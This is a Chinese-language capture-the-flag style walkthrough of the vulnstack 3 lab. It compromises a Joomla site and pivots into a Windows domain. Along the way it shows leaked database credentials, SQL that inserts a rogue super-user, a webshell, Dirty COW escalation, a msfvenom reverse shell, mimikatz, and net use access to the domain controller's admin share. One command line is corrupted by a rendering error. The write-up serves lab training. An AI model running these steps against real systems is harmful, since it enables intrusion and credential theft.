vulnstack（三） 红日靶场复现

说明：如您在读这篇复现中，有任何问题，欢迎vx：Bestboysendit 交流

目录：

一、环境配置

二、外网测试：
三、获取会话：
01信息收集
0201获取会话-msf
0201获取会话-cs
四、内网渗透：
五、参考链接：

打开虚拟机镜像为挂起状态，第一时间进行快照，部分服务未做自启，重启后无法自动运行。
挂起状态，账号已默认登陆，centos为出网机，第一次运行，需重新获取桥接模式网卡ip。
除重新获取ip，不建议进行任何虚拟机操作。
参考虚拟机网络配置，添加新的网络，该网络作为内部网络。

centos6.5 nat:192.168.134.130 仅主机：192.168.93.100
其它设备网卡配置为

开启后给win2008和win2012设备开启不休眠，不然，，，主要是没有密码。

注：名称及网段必须符合上述图片，进行了固定ip配置。
描述
目标：域控中存在一份重要文件。
本次环境为黑盒测试，不提供虚拟机账号密码。

二、外网测试：

1、nmap网段扫描：
经排查：192.168.134.130即为centos地址：

Nmap scan report for 192.168.134.130
Host is up (0.000083s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

2、访问80端口：
使用joomla写的

3、使用koomscan探测下：

apt install joomscan
joomscan -u http://192.168.134.130


Processing http://192.168.134.130 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.12

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.134.130/administrator/components
http://192.168.134.130/administrator/modules
http://192.168.134.130/administrator/templates
http://192.168.134.130/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.134.130/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.134.130/robots.txt

Interesting path found from robots.txt
http://192.168.134.130/joomla/administrator/
http://192.168.134.130/administrator/
http://192.168.134.130/bin/
http://192.168.134.130/cache/
http://192.168.134.130/cli/
http://192.168.134.130/components/
http://192.168.134.130/includes/
http://192.168.134.130/installation/
http://192.168.134.130/language/
http://192.168.134.130/layouts/
http://192.168.134.130/libraries/
http://192.168.134.130/logs/
http://192.168.134.130/modules/
http://192.168.134.130/plugins/
http://192.168.134.130/tmp/


[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config file is found
 config file path : http://192.168.134.130/configuration.php~

Your Report : reports/192.168.134.130/

3、扫到配置文件：

 config file path : http://192.168.134.130/configuration.php~

访问：有数据库信息
dbtype：mysqli
db：joomla
user：testuser
password：cvcvgjASD!@

4、navicat连接数据库：
可以看到超级用户名和用户 密码，但是密码太长而且md5解密解不出来……

解决：
已经登录到了数据库后台，因为不知道密码是什么加密方式，改密码也改不了，so，
一、自己搭一个环境，设置一个密码然后替换进去
官方重置密码方式：
https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn

数据库添加用户:
这里有个大坑，am2zu_users，和表umnbt_users里面的数据都是super user用户，我在umnbt_users里面添加了好久的用户……，正确的是am2zu_users表：

INSERT INTO `am2zu_users`
   (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Super User', 'admin2',
    'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');

添加成功：

5、访问joomscan给出的管理地址：
[+] admin finder
[++] Admin page : http://192.168.134.130/administrator/
这里centos重新获取了下地址，192.168.134.130地址改为192.168.134.129：

6、这种CMS一般直接找模板文件，添加php文件，而且登陆后也提示使用的是PHP环境，然后连马：这里直接给出了路径的：
先添加phpinfo尝试访问：

可以访问的到：且是php7版本+Ubuntu。而不是给出的centos

添加一句话：

7、连接：
这里菜刀连不上去……

换蚁剑直接上来
……，菜刀浪费我好久

8、但是不能执行命令，危险函数被禁用：

9、使用蚁剑绕过disable_function的插件：
在插件市场里面下载：

根据蚁剑得到的php版本选择模式，并绕过，绕过后会给出一个新的窗口。可以执行命令：

9.2绕过方法：
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

三、获取会话：

01信息收集

1、www-data用户，权限太低

2、且地址是192.168.93.120，不同于我们之前的192.168.134.0网段：，，，？so？已经进了内网？

3、文件夹内搜寻：
mysql下有一个用户文件：

4、查看已安装软件：
dpkg -l
安装了不少东西，，，没看到可以利用的，比如nmap

5、因为上面找到的用户名和密码，是从mysql找到的，而且上面查已经安装的软件发现数据库是在这台机器上的，但是上不去

那就可能是别的机子上的。尝试登录前面渗透的目标：192.168.134.129，可以连接上去：

地址有两个网卡，这就对应上了上面，渗透的是134网段，登录上去是93网段了，所以93网段是内网网段，且上面93.120 的设备为这台93.100提供了反向代理：

也和登录管理后台后提供的信息：php+ubuntu对应上了，因为渗透的目标93.100/134.129是centos

6、提权：
内核2.6.32，脏牛提权：
方式：https://www.cnblogs.com/shigfdengys/p/11297731.html

用SCP或者Moba连接上去后传exp，然后提权
成功：

7、获取root权限：

0201获取会话-msf
8、msf生成会话：
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.134.129 LPORT=4444 -f elf > shell.elf

但是木马执行不是很顺利，虽然已经是root权限，还是权限不允许：

这个鬼地方卡好久……，
如果出现Permission denied要么使用sudo权限去执行
如果1不行就说明当前文件夹确实没有指定的权限
文件夹：chmod -R 777
文件：chmod 777 路径

可以执行了但是上不去，换一条路：
使用MSF的web_delivery模块上线
https://blog.csdn.net/qq_40989258/article/details/110389788

选择exploit/multi/script/web_delivery模块

选择目标系统，我这里选择Linux

选择payload，我这里选择linux/x64/meterpreter/reverse_tcp

本机监听一下

运行，生成一条命令

目标机器执行上线

9、添加路由：

0201获取会话-cs
温习一下前两天学的CS上线：
1、执行cs服务端程序，开启服务，ip是kali的ip，密码是123

重新打开一个终端，在kali上执行cs客户端程序，用户名随意，密码123

创建一个监听器，ip就是kali的ip

生成生成Web Delivery

选择刚刚创建的那个Listener

会生成一条命令，使用菜刀连接webshell，打开虚拟终端，输入这条命令，不对哦~这命令-----ubuntu？
不复习了，明天学习！

四、内网渗透：

**
1、信息收集：

扫到三台：

[*] 192.168.93.10:445     - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:5h 53m 9s) (guid:{5b12dc58-504a-4130-afe1-ab52aa1f0f97}) (authentication domain:TEST)
[+] 192.168.93.10:445     -   Host is running Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)

[*] 192.168.93.20:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:89w 3d 4h 8m 44s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81})
[+] 192.168.93.20:445     -   Host is running Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)

[*] 192.168.93.30:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:95w 6d 0h 56m 40s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)
[+] 192.168.93.30:445     -   Host is running Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)

2、扫描SMB弱密码：有一台弱密码：

3、获取该主机会话：

这用run获取不到会话就用exploit试试……

4、获取权限，查看信息：

5、迁移进程，并加载mimikatz
迁移进程：在刚获得Meterpreter shell时，该shell是及其脆弱和易受攻击的，例如攻击者可以利用浏览器漏洞攻陷目标机器，但攻击渗透后浏览器有可能被用户关闭。所以第一步就是要移动这个shell，把他和目标机中一个稳定的进程绑定在一起，而不需要对磁盘进行任何写入操作。这样做使得渗透更难被检测到。

但是这里加载mimikatz之后执行不了命令……
借用别人搞好的，密码zxcASDqw123!!

6、信息收集-域

7、ping域，查看域控主机ip

8、获取域控主机上的文件：
net use z: \192.168.93.10\c$ zxcASDqw123!! /user:test\administrator
dir \192.168.93.10\cKaTeX parse error: Undefined control sequence: \users at position 1: \̲u̲s̲e̲r̲s̲\administrator\…\users\administrator\Documents\flag.txt

至此，拿到了重要文件，可以结束！

9、试点别的：
#设置远程桌面端口
reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f
#开启远程桌面
wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1
#检查端口状态
netstat -an|find “3389”
#关闭远程桌面
wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 0

五、参考链接：

https://blog.csdn.net/qq_40989258/article/details/110377147（推荐）
https://www.nnullull.cn/index.php/archives/19/
https://www.freebuf.com/articles/network/260575.html
https://blog.csdn.net/BROTHERYY/article/details/109963420